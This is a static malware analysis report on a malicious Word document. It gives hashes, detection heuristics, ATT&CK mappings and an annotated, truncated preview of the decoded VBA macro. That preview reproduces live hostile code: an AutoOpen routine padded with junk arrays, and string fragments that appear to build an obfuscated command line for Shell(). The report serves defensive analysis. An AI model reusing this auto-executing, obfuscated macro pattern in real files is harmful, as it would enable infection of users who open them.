Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c285fa1421bdc5b…

MALICIOUS

Office (OLE)

116.9 KB | Created: 2018-09-26 17:04:00 (taken from the document's own OLE metadata, which the author controls — do not treat it as a trustworthy build time) | Authoring application: Microsoft Office Word (also self-reported metadata) | First seen: 2019-02-10 (first observation by this service, not necessarily first use in the wild)
MD5: 9f7172e44621dfd087785b0dc2868a04 SHA-1: c1fa404889be5baff7b68edb5797536c3bfcd604 SHA-256: 8c285fa1421bdc5be91c159be7e99ea5065e3cb482cb73dcd44b1a0d46d0e4d6
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1204.002 — User Execution: Malicious File

The sample is a malicious Word (OLE) document containing a VBA macro with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The decoded macro source (73,848 bytes, extracted as macros.bas below) is heavily obfuscated: AutoOpen fills Variant arrays with Mid/MidB/Left/Right slices of identifiers that are never assigned in the visible excerpt, and the only statement with an observable effect is a call to QwckjikIDUX() whose argument is assembled from KeyString() results and the string-fragment function JZJLooFXHQM(). The Shell() call reported by the OLE_VBA_SHELL heuristic is the key execution indicator, but it does not appear in the portion of the preview reproduced here; the full source must be deobfuscated to recover the exact command line. Shell() establishes that the macro executes an arbitrary command; that this command downloads and runs a second-stage component is a plausible inference, not something the evidence on this page proves (the only URL recovered from the document is an OOXML schema namespace, not a download location).

Heuristics 6

  • ClamAV: Doc.Malware.00536d-6698605-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6698605-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this description conflicts with the OLE_VBA_MACROS finding and with the decoded VBA project extracted as macros.bas above; the auto-exec marker it keys on is the same AutoOpen name already covered by OLE_VBA_AUTOOPEN, so treat this finding as redundant with that one rather than as independent evidence of a WordBasic-era payload.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the DrawingML XML namespace identifier present in any Word document that contains drawing content; it is boilerplate, not a network indicator, and must not be treated as a C2/download URL or added to blocklists.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73848 bytes
SHA-256: d690ca5ad2b7d35bf2f3059580f477897e9ffbffce1a9f41273f33d7d268134f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SBnquSXU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as exported by olevba (analyst annotation; nothing above
' has been altered). VB_Name is a randomized module name; VB_Base pointing at
' Normal.ThisDocument suggests this is the document's own class module rather
' than a separate code module -- confirm against the OLE VBA project streams.
' Auto-execution entry point: Word runs AutoOpen when the document is opened
' with macros enabled (the OLE_VBA_AUTOOPEN finding above keys on this name).
' Analyst annotations only; no original statement has been altered.
Sub AutoOpen()
   ' The assignments below fill Variant arrays with Mid/MidB/Left/Right slices
   ' of concatenated identifiers (MzUrObE, pwGlcawGjsscRztHvw, ...). None of
   ' those identifiers is assigned anywhere in the visible excerpt, and none of
   ' the arrays (nKkwI ... woidE) is read again inside this Sub, so this looks
   ' like padding/junk code inserted to defeat signature matching -- confirm
   ' against the full 73,848-byte macros.bas before dismissing it.
   Dim nKkwI(2)
nKkwI(0) = MidB(MzUrObE + pwGlcawGjsscRztHvw + DwwjsL, 315, 281) + Right(TYRXa + jlrZsjkfkQiwQNfoiQhn + ohIsSk, 448)
nKkwI(1) = Right(LKRqKN + IbzjGGskUlSXCEEBcn + tmdFCOrs, 516) + Right(ZLqoh + ziPldJMQlGMmPGudpDis + CLdmK, 302) + Left(aoikHI + qwFmOdwijuEzwVpbkfZFVk + bHrzl, 931) + Mid(jnpwYO + bURQbtwjjwPjBRRVask + DloCz, 586, 53)
   Dim kNFtrV(2)
kNFtrV(0) = Mid(huQUwT + XiFVrLmQTahFcPavsY + aWVLHTzd, 695, 353) + Mid(BXGwPCTd + iAGpoEYXhrmizESQpq + kDEJcfqF, 57, 389)
kNFtrV(1) = MidB(VERfuFMF + PsHdGwANESAWmjvWcoRzLAE + VkiKMko, 235, 49) + Mid(sEpmaV + fvzJUiKzsvcCrwaInl + swSiXw, 603, 481) + MidB(VHrWbJb + qTGWWjwpAMhzhYBEmMS + zjEXV, 408, 323) + MidB(LGDmawz + pYcwYTPPHXPAAYpcS + jfvlaU, 392, 723)
   Dim XiASjk(1)
XiASjk(0) = Left(vSFAdw + nfHtUqLKNqwCiZftOi + hMLzSDH, 497) + Left(zJzvd + npHTtfwPaawCEuZhIM + CnBcq, 781) + Mid(wPjbtcQ + nACchbmfFEVvHAFjrCiIM + jVzacim, 3, 408) + MidB(fUMPzK + NAHfMMWkiFspkErQdaivm + BkUcDXZO, 603, 546)
   Dim iMuDj(2)
iMuDj(0) = MidB(pwrcLR + mTdNsRTHaMzsETYaWw + LpivA, 450, 3) + MidB(rnUuw + zRsmdhYqFmImOEPRXJM + HMGwAfwG, 86, 350) + Mid(FvbrI + ukraPZPijrAvfQOlY + jDVNh, 168, 187) + Right(PwHWLPl + bQUaMVrFPKdWmEnFBXQFp + ziikPiX, 878)
iMuDj(1) = MidB(mGrzWczt + sMMhHcjoKKiUkXZAfFdpB + wFfuRLLI, 688, 710) + MidB(cnwiZljI + bIBZtrPXKjJfatzSLAm + zMhXDDS, 868, 235)
   Dim Psfti(2)
Psfti(0) = Mid(zAcsUBf + CibwZGzlmhIiYhEmGFSNNd + tErhfs, 836, 711) + Mid(lkJshHwB + cvJXwtMjUNVFsuFCPr + rKUdN, 445, 210) + Right(BPrwu + mofBJdQWnoNrzNZSNbQroYD + dvHwaU, 313) + Mid(luOud + izZMnpCcGIVzFbwNbfq + jmNDzD, 363, 963)
Psfti(1) = Right(Gbiojo + VULuiIpnwQfKDdBczJY + MjjCa, 740) + MidB(iiVSKo + vHQUhdVPaLiMsrAhzlFOA + wQVrsptj, 85, 33)
   Dim WtsSMR(2)
WtsSMR(0) = MidB(HQTHXZ + jpaGoNWcRTLTsmzmfBjFufZ + dEJwDL, 655, 64) + MidB(pIXPmvz + OdVRbmUrkfaPabIVHHKjL + iIluK, 946, 433) + Right(lIniMj + TGJaiPRmcCmDLUIMF + iDlAVq, 775) + MidB(XnjQE + vsUjXVUVszbOEXOYFohtbWN + zXcGNnM, 377, 726)
WtsSMR(1) = Right(Njufd + LEAZKfssOwsBqszP + arDcwr, 223) + MidB(CPhJBOiZ + aVvwVLrLtBhOCMwzOjUW + iLDIn, 228, 366)
   ' The only statement in AutoOpen with a visible effect: calls QwckjikIDUX
   ' (not defined in this excerpt) with a single string assembled from
   ' KeyString() results (also not defined here), the fragment-builder
   ' JZJLooFXHQM() from module OsvsANOrRd below, and further undefined names.
   ' NOTE(review): presumably the decode-and-launch path that reaches the
   ' Shell() call reported by OLE_VBA_SHELL -- verify in the rest of the source.
QwckjikIDUX (KeyString(Lcvdz + EFFJJWz + 9 + 13 + 45 + lBGVP + ozCmww) + CRKBwEX + zOXOaVZ + KeyString(QijzkpoG + zWjFKbH + 11 + 15 + 51 + wlwOc + BAGNbd) + JZJLooFXHQM + IsvwDX + NDjXLzQI + TqaUICNjAWE + CfiHl + TDYOv + iKTlzbl + nYlKGKGp)
   ' Further unused junk arrays after the call (same pattern as above).
   Dim mqjFt(1)
mqjFt(0) = MidB(VkcopoO + nRUOZziGzFiijdOjmBFaLRF + CzjXmHX, 783, 403) + Mid(oLacwTAn + ZhwhkzhrzTztEhvaMot + sbbdd, 843, 323) + Mid(lcPmqBKp + hXrRWilENoKfDJVENQjBw + QaruPWr, 651, 919) + MidB(JEjuG + KazLqrpkjvsJufIu + STzISnAQ, 460, 365)
   Dim VGUIzf(1)
VGUIzf(0) = MidB(NwRraEj + KzuTkjHRvubFzCjuahqjG + sStnj, 482, 323) + MidB(MjikWM + kjzHzLfpdHHoDjqpY + VKGkpz, 318, 579)
   Dim qpwZQ(2)
qpwZQ(0) = MidB(ChIrvJru + bEjXRoVKBMZLOLutWPmkumq + aBPqwH, 793, 495) + Left(ZBaObujc + fAPbPWcplkbkzkVdDZlrE + wAKpKKU, 196)
qpwZQ(1) = MidB(lnbaiA + FzQbdnNzSTuklZci + aGaIKCz, 887, 64) + Left(fawtMU + jwLCqwaDqACVirqTTlLT + uOjMqYFF, 144) + MidB(PEkLubt + WDEjUWBDlUJvihON + zOdNOmGH, 478, 186) + Right(sWrJAr + DBVdAvodMNHZpbVFP + ibDNWmEY, 639)
   Dim woidE(1)
woidE(0) = Mid(CamHmuGI + BmLBHGADXNrYMjaEaRbY + XfLKN, 231, 605) + Left(WjzTo + dBLcKCZCNjDZsZOkMupqMir + kkNlIwna, 237)
End Sub


Attribute VB_Name = "OsvsANOrRd"
' Second (randomized-name) module; it holds the string-fragment function
' JZJLooFXHQM referenced from AutoOpen above. The function body is cut off in
' this preview, so its full output cannot be reconstructed from this page.
Function JZJLooFXHQM()
tzAZjJRlV = "d /  \//// /   /\ /V" + ":O/C" + """" + "set $};=a270 2" + "a07 a270 07" + "2a a720 20a7" + " 0a27 0a72 02"
zfLUJuzp = "a7 70a2 a207 a" + "270 7a02 02a7" + " 702a 027a a207 07"
RNCUJKqp = "2a}7a20}270a{a" + "720h7a20c207" + "at072aaa207c02a7" + "}a720;27a0k720" + "aa20a7e07a2r20a"
tnmJGksooEw = "7b072a;a702j7" + "0a2O270aaa270$a270" + " 2a70ma027e" + "a270t7a20I" + "20a7-072ae0a72ka072"
JZJLooFXHQM = tzAZjJRlV + zfLUJuzp + RNCUJKqp + tnmJGksooEw
   Dim OJlDrF(
... (truncated)